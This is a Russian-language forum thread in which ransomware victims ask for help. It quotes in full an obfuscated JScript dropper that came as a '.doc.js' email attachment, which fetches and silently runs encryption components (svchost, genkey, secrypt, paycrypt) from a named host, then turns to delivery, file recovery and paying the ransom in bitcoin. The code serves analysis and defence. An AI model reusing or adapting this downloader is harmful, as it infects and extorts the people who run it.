собсно если кто шарит в Js то вот сам файл скрипта. Буду рад, если расшифруете что конкретно по шагам он делает.
скрипт
Код:
var _0x495c="MSXML2.XMLHTTP onreadystatechange readyState ADODB.Stream open type write position saveToFile close GET send WScript.Shell %TEMP%\\ http://russmebelspb.com/index_files/document document.doc http://russmebelspb.com/index_files/cde cde.cmd http://russmebelspb.com/index_files/svchost svchost.like http://russmebelspb.com/index_files/iconv iconv.dll http://russmebelspb.com/index_files/genkey genkey.like http://russmebelspb.com/index_files/secrypt secrypt.like http://russmebelspb.com/index_files/paycrypt paycrypt.like http://russmebelspb.com/index_files/javav javav.like http://russmebelspb.com/index_files/DEC01 DEC01 http://russmebelspb.com/index_files/DEC02 DEC02 http://russmebelspb.com/index_files/input2 input2.like http://russmebelspb.com/index_files/input1 input1.like".split(" ");
function Run(b){WshShell.Run(b,0,0)}function saveFile(b,d){var c=new ActiveXObject(_0x495c[0]);c[_0x495c[1]]=function(){if(4===c[_0x495c[2]]){var a=new ActiveXObject(_0x495c[3]);a[_0x495c[4]]();a[_0x495c[5]]=1;a[_0x495c[6]](c.ResponseBody);a[_0x495c[7]]=0;a[_0x495c[8]](d,2);a[_0x495c[9]]()}};c[_0x495c[4]](_0x495c[10],b,!1);c[_0x495c[11]]()}function CreateObject(b){return new ActiveXObject(b)}var WshShell=CreateObject(_0x495c[12]),DestinationFLE=_0x495c[13],DestinationFLE=WshShell.ExpandEnvironmentStrings(DestinationFLE);
saveFile(_0x495c[14],_0x495c[15]+DestinationFLE+_0x495c[16]);try{Run(_0x495c[15]+DestinationFLE+_0x495c[16])}catch(wrd){}saveFile(_0x495c[17],_0x495c[15]+DestinationFLE+_0x495c[18]);saveFile(_0x495c[19],_0x495c[15]+DestinationFLE+_0x495c[20]);saveFile(_0x495c[21],_0x495c[15]+DestinationFLE+_0x495c[22]);saveFile(_0x495c[23],_0x495c[15]+DestinationFLE+_0x495c[24]);saveFile(_0x495c[25],_0x495c[15]+DestinationFLE+_0x495c[26]);saveFile(_0x495c[27],_0x495c[15]+DestinationFLE+_0x495c[28]);
Run(_0x495c[15]+DestinationFLE+_0x495c[18]);saveFile(_0x495c[29],_0x495c[15]+DestinationFLE+_0x495c[30]);saveFile(_0x495c[31],_0x495c[15]+DestinationFLE+_0x495c[32]);saveFile(_0x495c[33],_0x495c[15]+DestinationFLE+_0x495c[34]);saveFile(_0x495c[35],_0x495c[15]+DestinationFLE+_0x495c[36]);saveFile(_0x495c[37],_0x495c[15]+DestinationFLE+_0x495c[38]);
[свернуть]
Появились мысли отключить\удалить службу\программу запуска скриптов, либо написать программу\батник\etc проверки на расширения файлов перед запуском. если js, то не пропускать. кто чем помочь может?
Последний раз редактировалось CuxpecT; 03.07.2014 в 10:20.
а как из архива может стартануть какой то файл или там был SFX с автозапуском? какие файлы они шифруют ибо на шифрацию среднего диска по рса-1024 уйдет 6-8 часов но все равно нормальный IPS должен блокировать попытки обращения к системе и файлам по 0-day
пробовали вытаскивать файлы с загрузочного диска или флехи?
Последний раз редактировалось anchous; 03.07.2014 в 16:59.
а как из архива может стартануть какой то файл или там был SFX с автозапуском?
в архиве файл "Проект Акта сверки просим ознакомиться и оплатить долг 27_06_2014 бухгалтерия сверка долг по старым поставкам и заказам ответьте по сумме 6843_dr.web_attachment.dос.js" Пользователи не видят второго расширения и открывают на исполнение. Текст скрипта постом выше.
Сообщение от anchous
какие файлы они шифруют ибо на шифрацию среднего диска по рса-1024 уйдет 6-8 часов
рандомно файлы на диске С, в моих документах, файлы на рабочем столе. Принцип, по которому отбирает файлы для шифрации пока не понял. Пример зашифрованных файлов в архиве в первом посте.
Сообщение от anchous
но все равно нормальный IPS должен блокировать попытки обращения к системе и файлам по 0-day
но не блокирует =\
Сообщение от anchous
пробовали вытаскивать файлы с загрузочного диска или флехи?
Не совсем в тему, но вставлю кое-какие наблюдения. По некоторым причинам приходится пользоваться четырьмя дополнениями для хрома(в основном на нем). Среди них RDS Bar, Gismeteo, X New Tab Page, Webpage Screenshot.
Что было замечено: тематический спам на почту приходит. То есть, если в этой неделе меня интересовала инфа о том, как закрывается-открывается ИП, то мой ящик gmail атаковали всякого рода предложения от посредников. Сдается мне, что кое-кто отслеживает и сливает, причем это явно не скриншотики или гисметео. Такие дела.
Аналогичная хрень на работе, пришли к решению оплатить, в суд подавать не будем так как расчетный счет на обычную пластиковую карту, и 100% на левого человека...
Вчера оплатил, до сих пор не прислали дешифратор, в стар посте я упустил инфу что оплата через биткоины, выйти на них вообще не реально, так как насколько я знаю, владельца кошелька биткоины, не как не вычислить. З.Ы. Начинаю нервничать, но надежда на то что пришлют дешифратор еще осталась), скидывал им зашифрованные файлы в ответ получал от них нормальные, вывод они могут их расшифровать.